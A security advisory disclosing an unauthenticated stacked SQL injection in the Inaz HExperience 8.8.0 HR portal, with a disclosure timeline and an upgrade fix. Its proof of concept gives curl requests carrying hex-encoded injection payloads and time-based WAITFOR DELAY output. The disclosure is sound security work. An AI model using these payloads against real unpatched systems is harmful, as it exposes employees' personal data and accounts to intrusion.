Swascan Offensive Security Team has identified 1 vulnerability on Inaz HExperience v8.8.0 application. The vulnerability has been fixed in version 8.9.0.
INAZ
INAZ is the Italian company specialized in software and solutions for administering, managing and organizing work.
It designs, manufactures and markets products, tools and services and continues to do research and innovation, collaborates with universities, promotes partnerships with companies that develop original and new products.
Product description
Inaz HExperience is the HR platform is a web-based application integrates and streamlines solutions, tools and information to help everyone work better. It makes talent management, cooperation and innovative types of organisation easier. The HExperience platform is a powerful database with all the operating modules you need.
Technical summary
Swascan Offensive Security Team found an important vulnerability on: Inaz HExperience v8.8.0:
Vulnerability | CVSSv3.1 | CVSSv3.1 Base Vector |
Unauthenticated Stacked SQL injection | 9.8 – Critical | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
In the following section we provide technical details about this vulnerability, including evidence and a proof-of-concept. This vulnerability can affect hundreds of Internet-connected devices.
Description
In Inaz HExperience Product version 8.8.0, an attacker will be able to remotely access the information contained in the database and carry out operations such as exfiltration and modification of user and administrative accounts, users personal information (PII) and more, without the need of authentication.
Proof of Concept
The following POC shows how to trigger a Stacked SQL Injection on Microsoft SQL Server with the time-based technique:
$ time curl -kis -X POST -d "ValMail=273120756E696F6E2073656C65637420313233&ValCodFisc= 31273b57414954464f522044454c41592027303a303a35272d2d" https://URL/Portale/FunMobile/VerificaCand.aspx
Il nome di oggetto 'UserHR.cand_est' non è valido.<br><br>SELECT kint, cod_fisc_caes FROM UserHR.cand_est WHERE cod_fisc_caes = '1';WAITFOR DELAY '0:0:5'--'
real 0m5,649s
user 0m0,026s
sys 0m0,000s
$ time curl -kis -X POST -d "ValMail=273120756E696F6E2073656C65637420313233&ValCodFisc= 31273b57414954464f522044454c41592027303a303a3130272d2d" https://URL/Portale/FunMobile/VerificaCand.aspx
Il nome di oggetto 'UserHR.cand_est' non è valido.<br><br>SELECT kint, cod_fisc_caes FROM UserHR.cand_est WHERE cod_fisc_caes = '1';WAITFOR DELAY '0:0:10'--'
real 0m10,655s
user 0m0,019s
sys 0m0,005s
$ time curl -kis -X POST -d "ValMail=273120756E696F6E2073656C65637420313233&ValCodFisc=31273b57414954464f522044454c41592027303a303a3135272d2d" https://URL/Portale/FunMobile/VerificaCand.aspx
Il nome di oggetto 'UserHR.cand_est' non è valido.<br><br>SELECT kint, cod_fisc_caes FROM UserHR.cand_est WHERE cod_fisc_caes = '1';WAITFOR DELAY '0:0:15'--'
real 0m15,819s
user 0m0,021s
sys 0m0,009s
Impact
If correctly expoited, this vulnerability could lead to acquire local Administrator rights, resulting in access to all the portal features. In some cases it could be possible to execute commands on the remote OS.
Remediation
Upgrade INAZ HEXPERIENCE to version 8.9.0.
Disclosure Timeline
- 07-04-2022: Vulnerabilities discovered
- 07-04-2022: INAZ contacted by email (1st time, no reply)
- 15-04-2022: INAZ contacted by email (2nd time, reply)
- 20-04-2022: INAZ ask for a technical in-depth analysis
- 27-04-2022: Videocall for technical in-depth analysis
- 23-05-2022: INAZ release a patch (new HEXPERIENCE v8.9.0)
- 30-06-2022: Swascan send a draft of Security Advisory
Sources and references
https://cwe.mitre.org/data/definitions/89.html